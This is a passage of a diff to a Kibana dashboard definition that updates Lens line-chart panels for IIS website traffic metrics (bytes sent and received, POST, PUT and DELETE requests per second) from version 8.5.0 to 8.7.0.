+ "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Sent/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "6bac7104-6ff4-480a-9987-ce2e92628053", + "w": 19, + "x": 29, + "y": 12 + }, + "panelIndex": "6bac7104-6ff4-480a-9987-ce2e92628053", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1479d23f-c6ca-4248-857a-3f81f884e0b2": { + "columnOrder": [ + "479fac87-32a3-44f8-852e-69aa14eb5d13", + "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", + "35da7e3b-471c-4f76-ab90-03c78193bd02" + ], + "columns": { + "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "35da7e3b-471c-4f76-ab90-03c78193bd02": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Received", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "1479d23f-c6ca-4248-857a-3f81f884e0b2": { - "columnOrder": [ - "479fac87-32a3-44f8-852e-69aa14eb5d13", - "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", - "35da7e3b-471c-4f76-ab90-03c78193bd02" - ], - "columns": { - "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - 
"scale": "interval", - "sourceField": "@timestamp" - }, - "35da7e3b-471c-4f76-ab90-03c78193bd02": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Received", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.bytes_received_per_sec" - }, - "479fac87-32a3-44f8-852e-69aa14eb5d13": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.bytes_received_per_sec" + }, + "479fac87-32a3-44f8-852e-69aa14eb5d13": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": 
true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "35da7e3b-471c-4f76-ab90-03c78193bd02" - ], - "layerId": "1479d23f-c6ca-4248-857a-3f81f884e0b2", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "479fac87-32a3-44f8-852e-69aa14eb5d13", - "xAccessor": "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "35da7e3b-471c-4f76-ab90-03c78193bd02" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "35da7e3b-471c-4f76-ab90-03c78193bd02" + ], + "layerId": "1479d23f-c6ca-4248-857a-3f81f884e0b2", + "layerType": "data", + "palette": { + "name": 
"default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "6bac7104-6ff4-480a-9987-ce2e92628053", - "w": 19, - "x": 29, - "y": 12 - }, - "panelIndex": "6bac7104-6ff4-480a-9987-ce2e92628053", - "title": "Bytes Received/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "479fac87-32a3-44f8-852e-69aa14eb5d13", + "xAccessor": "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "35da7e3b-471c-4f76-ab90-03c78193bd02" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "03f125d4-c99c-460e-bc11-be08f9294423": { - "columnOrder": [ - "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", - "451975f8-afff-4a05-befc-dbeb807a5ad0", - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - ], - "columns": { - "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": 
"___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "451975f8-afff-4a05-befc-dbeb807a5ad0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "POST Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.post_requests_per_sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Received/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "4f05e422-f1be-4856-be21-9be206b34834", + "w": 12, + "x": 12, + "y": 24 + }, + "panelIndex": "4f05e422-f1be-4856-be21-9be206b34834", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "03f125d4-c99c-460e-bc11-be08f9294423": { + "columnOrder": [ + "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", + "451975f8-afff-4a05-befc-dbeb807a5ad0", + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + ], + "columns": { + "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of 
iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - ], - "layerId": "03f125d4-c99c-460e-bc11-be08f9294423", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", - "xAccessor": "451975f8-afff-4a05-befc-dbeb807a5ad0", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + 
"451975f8-afff-4a05-befc-dbeb807a5ad0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "POST Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.website.network.post_requests_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + ], + "layerId": "03f125d4-c99c-460e-bc11-be08f9294423", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "4f05e422-f1be-4856-be21-9be206b34834", - "w": 12, - "x": 12, - "y": 24 - }, - "panelIndex": "4f05e422-f1be-4856-be21-9be206b34834", - "title": "POST Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", + "xAccessor": "451975f8-afff-4a05-befc-dbeb807a5ad0", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + 
"position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "a85e6389-be86-43f8-a3e8-9f8231a56b4c": { - "columnOrder": [ - "76fcf5e4-a16d-4094-9362-2c968d92ca14", - "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", - "79a16408-a2dd-4f58-906f-45ccb548697c" - ], - "columns": { - "76fcf5e4-a16d-4094-9362-2c968d92ca14": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "79a16408-a2dd-4f58-906f-45ccb548697c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "PUT Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.put_requests_per_sec" - }, - 
"a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "POST Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", + "w": 12, + "x": 24, + "y": 24 + }, + "panelIndex": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a85e6389-be86-43f8-a3e8-9f8231a56b4c": { + "columnOrder": [ + "76fcf5e4-a16d-4094-9362-2c968d92ca14", + "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", + "79a16408-a2dd-4f58-906f-45ccb548697c" + ], + "columns": { + "76fcf5e4-a16d-4094-9362-2c968d92ca14": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - 
"fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "79a16408-a2dd-4f58-906f-45ccb548697c" - ], - "layerId": "a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "76fcf5e4-a16d-4094-9362-2c968d92ca14", - "xAccessor": "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(211,49,21,1)", - "forAccessor": "79a16408-a2dd-4f58-906f-45ccb548697c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + }, + "79a16408-a2dd-4f58-906f-45ccb548697c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "PUT Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } + }, + "scale": "ratio", + "sourceField": "iis.website.network.put_requests_per_sec" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + 
"sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "79a16408-a2dd-4f58-906f-45ccb548697c" + ], + "layerId": "a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", - "w": 12, - "x": 24, - "y": 24 - }, - "panelIndex": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", - "title": "PUT Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "76fcf5e4-a16d-4094-9362-2c968d92ca14", + "xAccessor": "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(211,49,21,1)", + "forAccessor": "79a16408-a2dd-4f58-906f-45ccb548697c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - 
"datasourceStates": { - "indexpattern": { - "layers": { - "9aa14584-ac2e-4743-8fbe-6522dd3f72c6": { - "columnOrder": [ - "4496f59a-ae54-445e-bdeb-5684d1b0b73d", - "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", - "9639a877-1eaa-4f16-b151-d41c43410355" - ], - "columns": { - "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "4496f59a-ae54-445e-bdeb-5684d1b0b73d": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "9639a877-1eaa-4f16-b151-d41c43410355": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DELETE Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.delete_requests_per_sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "PUT Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", + "w": 12, + "x": 36, + "y": 24 + }, + 
"panelIndex": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9aa14584-ac2e-4743-8fbe-6522dd3f72c6": { + "columnOrder": [ + "4496f59a-ae54-445e-bdeb-5684d1b0b73d", + "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", + "9639a877-1eaa-4f16-b151-d41c43410355" + ], + "columns": { + "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "4496f59a-ae54-445e-bdeb-5684d1b0b73d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "9639a877-1eaa-4f16-b151-d41c43410355" - ], - "layerId": "9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": 
"4496f59a-ae54-445e-bdeb-5684d1b0b73d", - "xAccessor": "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(25,77,51,1)", - "forAccessor": "9639a877-1eaa-4f16-b151-d41c43410355" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "9639a877-1eaa-4f16-b151-d41c43410355": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DELETE Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.website.network.delete_requests_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9639a877-1eaa-4f16-b151-d41c43410355" + ], + "layerId": "9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "layerType": "data", + "palette": { + 
"name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", - "w": 12, - "x": 36, - "y": 24 - }, - "panelIndex": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", - "title": "DELETE Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "4496f59a-ae54-445e-bdeb-5684d1b0b73d", + "xAccessor": "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(25,77,51,1)", + "forAccessor": "9639a877-1eaa-4f16-b151-d41c43410355" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "DELETE Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", + "w": 12, + "x": 0, + "y": 24 + }, + "panelIndex": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
